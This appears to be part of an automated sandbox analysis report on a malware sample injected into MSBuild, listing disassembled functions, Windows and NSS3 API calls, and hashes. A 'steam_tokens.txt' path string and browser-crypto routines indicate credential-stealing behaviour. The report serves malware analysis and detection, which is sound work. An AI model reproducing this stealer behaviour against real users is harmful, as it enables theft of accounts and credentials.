Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: f536500b2de659c8a874ca9889abf0fc51c0efb1626a2a79b1b13ac7ae800b69
Instruction ID: 826e2aa9427842c294e4836ca14d892f66531012b6896052894a1827d72e86a7
Opcode Fuzzy Hash: f536500b2de659c8a874ca9889abf0fc51c0efb1626a2a79b1b13ac7ae800b69
Instruction Fuzzy Hash: 4131C77280010DAFDF25EFA0DC03EE8777AEB0C309F05149EB609A72A1DA759A909F55

Function 00417143 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

lstrlenA.KERNEL32(?), ref: 0041718A

Part of subcall function 00417023: CreateThread.KERNEL32(00000000,00000000,00416F52,?,00000000,00000000), ref: 004170C2
Part of subcall function 00417023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004170CA

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041719A

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 444e77d572ffba00ebc6e44a85d8508b04b5c4b17b4aa2f100531ae59661ec68
Instruction ID: 6618271ae8dd7199904eae312c9496c80f7da9e978911cbdef3aac56a65875e3
Opcode Fuzzy Hash: 444e77d572ffba00ebc6e44a85d8508b04b5c4b17b4aa2f100531ae59661ec68
Instruction Fuzzy Hash: EF012131D00109ABCF00FBA6DD478CEBB389E04348F50417AFA0073152DB78AA8987D9

Function 00411DF4 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C

Strings

siA, xrefs: 00411E1C

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID: siA
API String ID: 3494564517-470986483
Opcode ID: fb61fe623097888cf65d3814ddf1640f9bdc70486a4c33bd704b3484e22c8f94
Instruction ID: 346925838d3b14811ea8838da46691f13996bcddb0819abdd03295e02f918ba5
Opcode Fuzzy Hash: fb61fe623097888cf65d3814ddf1640f9bdc70486a4c33bd704b3484e22c8f94
Instruction Fuzzy Hash: FBE02B3AA017115B87224BFAD8146A7BB5A9FC5B61B08416BEF48CB325C5B5CC4186E4

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 05bdf160f8efc9cc43d5322af45abfc495ce26904b45161f00d02fdde4737ff8
Instruction ID: c887a8aab8905174e490e40543d587288c91d689b553aa8af607c42ebbdab75a
Opcode Fuzzy Hash: 05bdf160f8efc9cc43d5322af45abfc495ce26904b45161f00d02fdde4737ff8
Instruction Fuzzy Hash: 6911B172A04705ABC724CFB8C989B9BB7F4EB40714F24883EE64AE7390D278B940C715

Function 0041CD49 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CD5A

Part of subcall function 0041BCFD: lstrlenA.KERNEL32(?,0041CD6B,0041CE0D,00000000,06400000,00000003,00000000,0041770B,.exe,00436C64,00436C60,00436C5C,00436C58,00436C54,00436C50,00436C4C), ref: 0041BD2F
Part of subcall function 0041BCFD: malloc.MSVCRT ref: 0041BD37
Part of subcall function 0041BCFD: lstrcpyA.KERNEL32(00000000,?), ref: 0041BD42

malloc.MSVCRT ref: 0041CD97

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: f9200b95373ff1b7789a744542eff742420212f49676e2a89c92c5c195539ba2
Instruction ID: c965e71d2e97414644382344fe4b35b0bcccdd97024118387abac70bfbe530a4
Opcode Fuzzy Hash: f9200b95373ff1b7789a744542eff742420212f49676e2a89c92c5c195539ba2
Instruction Fuzzy Hash: 71F0F0362412215BC7206BAAFC80A8BBF94EB847A0F15013BED089B341DA34CC4083E8

Function 0041863A Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb4e46ecdc6af7a7d879d51c0e4f3366769e87bd045afa1f794dcb15901cb75
Instruction ID: 11a7e7eb0bc33325116b84792d9ccbf3134a4ee29e7b429e6daf7afeb5da7636
Opcode Fuzzy Hash: ffb4e46ecdc6af7a7d879d51c0e4f3366769e87bd045afa1f794dcb15901cb75
Instruction Fuzzy Hash: D9516071802600ABCA617BEE854DAF6B2D59FB1318F14049FF424AA372CF6D8DD05E5D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96dba7d2176548813934cd4752c0dec6ffeda168b931416bfbb007fd47364fb
Instruction ID: 6388f4461eef54f9e8a11e2a77b8a0ea95f6d38d64ecf6345b785b7c3698f7fe
Opcode Fuzzy Hash: c96dba7d2176548813934cd4752c0dec6ffeda168b931416bfbb007fd47364fb
Instruction Fuzzy Hash: 9A318F71D0C2149FDF16DF55D9408AEBBB1EF84354B20816BE410B7391D738AE81DB9A

Function 00411D91 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: f251ba91b184b9827cfca62372c4852bcaebef6b61757427f57cd5b7b8179dd8
Instruction ID: e117c88700240214466cc1b6d60fdd9482b3e7f1e292b6b988d501d706d71d9b
Opcode Fuzzy Hash: f251ba91b184b9827cfca62372c4852bcaebef6b61757427f57cd5b7b8179dd8
Instruction Fuzzy Hash: 0AF03071E0015DABDB15DF78DC909EEB7FCEB44204F0005BAB909D3241DA349F458B94

Function 00411D67 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5bd9dccb6b3b3ada47ed5805296656baf1afb4dfc64e1a8b5f95435fe6bc619a
Instruction ID: ddb6e52d0ff1f1191deb47ea6c0d9b73f3e49b1a14ce765bc69ad84851da93f8
Opcode Fuzzy Hash: 5bd9dccb6b3b3ada47ed5805296656baf1afb4dfc64e1a8b5f95435fe6bc619a
Instruction Fuzzy Hash: 4AD05E31240138578B1457A9EC055DABB08DB017B5F001222FA69921B0C365AE9282C4

Function 00412516 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 0041254C

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 4db8ebf57bc6107b71b5ba4193d59d5f03bca1d24e9a0919771ad3cddd4420d4
Instruction ID: eaea2de8574f2c4140e53920b4a13b58a368e230bb1e65c66a238f6e4d3fc1a7
Opcode Fuzzy Hash: 4db8ebf57bc6107b71b5ba4193d59d5f03bca1d24e9a0919771ad3cddd4420d4
Instruction Fuzzy Hash: ABE075B0D0420E9FCF44EFA596152DDBAF4AB48308F00916AC115F2240E3B482058BA9

Function 0041C4BE Relevance: 1.3, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041C4CF

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 89171ac531111191199856e9ad24f0c21c4adc490551604bc99cdcc5c92fb716
Instruction ID: fcc83814f70704bd6d13a6bcc85abea1ca3ddb0e8ce88e5aad64fb42fa5d3e86
Opcode Fuzzy Hash: 89171ac531111191199856e9ad24f0c21c4adc490551604bc99cdcc5c92fb716
Instruction Fuzzy Hash: 7521F474200710CFC320DF6ED484996B7F5FF49324714486EEA8A9B722D776E880CB16

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 6CB90570 Relevance: 22.8, APIs: 15, Instructions: 256memoryCOMMON

Download Yara Rule

APIs

PK11_HPKE_Deserialize.NSS3(?,?,?,00000000), ref: 6CB905E3
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB9060C
PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6CB9061A
PK11_PubDeriveWithKDF.NSS3 ref: 6CB90712
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CB90740
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CB90760
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CB907AE
PK11_FreeSymKey.NSS3(?), ref: 6CB907BC
PK11_FreeSymKey.NSS3(?), ref: 6CB907D1
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB907DD
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB907EB
SECITEM_ZfreeItem_Util.NSS3(00000001,00000001), ref: 6CB907F8
PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CB9082F
memcpy.VCRUNTIME140(?,?,?), ref: 6CB908A9
SECITEM_DupItem_Util.NSS3(?), ref: 6CB908D0

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: K11_$Item_Util$ContextDestroyErrorFreeZfreememcpy$AllocCreateDeriveDeserializePublicWith
String ID:
API String ID: 657680294-0
Opcode ID: 7a94abc11dcabac0869ccf36a0c623375da8f10debbf486481aac0dc03d8384b
Instruction ID: bc888af99d9a1e94e55de760d3a637ac55ac81285db393fc830fe8e1f8f7c220
Opcode Fuzzy Hash: 7a94abc11dcabac0869ccf36a0c623375da8f10debbf486481aac0dc03d8384b
Instruction Fuzzy Hash: 2391A1B5A043809BE700CF25E880B5B77F1EF8A318F15852CE99987791EB35D844CB92

Function 6CBCEFF0 Relevance: 21.4, APIs: 14, Instructions: 362memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBCC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CBCDAE2,?), ref: 6CBCC6C2

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBCF0AE
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBCF0C8
PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6CBCF101
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBCF11D
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6CC9218C), ref: 6CBCF183
SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6CBCF19A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBCF1CB
SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CBCF1EF
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CBCF210

Part of subcall function 6CB752D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6CBCF1E9,?,00000000,?,?), ref: 6CB752F5
Part of subcall function 6CB752D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6CB7530F
Part of subcall function 6CB752D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6CB75326
Part of subcall function 6CB752D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6CBCF1E9,?,00000000,?,?), ref: 6CB75340

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBCF227

Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7

SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6CBCF23E

Part of subcall function 6CBBBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CB6E708,00000000,00000000,00000004,00000000), ref: 6CBBBE6A
Part of subcall function 6CBBBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CB704DC,?), ref: 6CBBBE7E
Part of subcall function 6CBBBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CBBBEC2

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CBCF2BB
PR_SetError.NSS3(FFFFE006,00000000), ref: 6CBCF3A8

Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6CBCF3B3

Part of subcall function 6CB72D20: PK11_DestroyObject.NSS3(?,?), ref: 6CB72D3C
Part of subcall function 6CB72D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CB72D5F

Memory Dump Source

Source File: 00000002.00000002.2563245248.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true

Associated: 00000002.00000002.2563200740.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564085586.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564137576.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564185008.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2564231133.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6cae0000_MSBuild.jbxd

Similarity

API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
String ID:
API String ID: 1559028977-0
Opcode ID: 8c17eec8ee8d5dc5ae7e69a30ddb67a10635b2618f779bcd74a0d2b8adcf0e91
Instruction ID: f88075c67a378a6a889aaac98331dfc33770749d49d7785444d83f3fad0a1bfd
Opcode Fuzzy Hash: 8c17eec8ee8d5dc5ae7e69a30ddb67a10635b2618f779bcd74a0d2b8adcf0e91
Instruction Fuzzy Hash: A0D181B6F012459FDB14CF99D880A9EB7F5FF88308F158069E925A7711EB31E805CB52

Function 6CB90EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6CB90F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CB90FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CB91006
PK11_FreeSymKey.NSS3(?), ref: 6CB9101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB91033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB9103F
PK11_FreeSymKey.NSS3(00000000), ref: 6CB91048
memcpy.VCRUNTIME140(?,?,?), ref: 6CB9108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CB910BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CB910D6
memcpy.VCRUNTIME140(?,?,?), ref: 6CB9112E

Part of subcall function 6CB91570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CB908C4,?,?), ref: 6CB915B8
Part of subcall function 6CB91570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CB908C4,?,?), ref: 6CB915C1
Part of subcall function 6CB91570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB9162E
